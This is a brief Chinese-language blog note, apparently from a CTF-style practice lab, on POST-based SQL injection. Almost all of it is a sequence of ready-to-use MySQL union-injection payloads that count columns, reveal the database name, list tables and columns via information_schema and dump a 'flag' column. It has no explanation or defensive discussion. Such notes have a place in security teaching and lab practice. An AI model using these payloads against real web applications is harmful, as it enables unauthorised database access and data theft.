POST注入就是在输入框中进行注入
可以先输入'order by 2 # 查字段
爆库
' union select 1,database()#
爆表
?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
爆字段
?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='zkaq'#
爆flag
?id=1' and 1=2 union select 1,group_concat(zKaQ) from zkaq#
打赏我,让我更有动力~
© 2016 - 2022 掌控者 All Rights Reserved.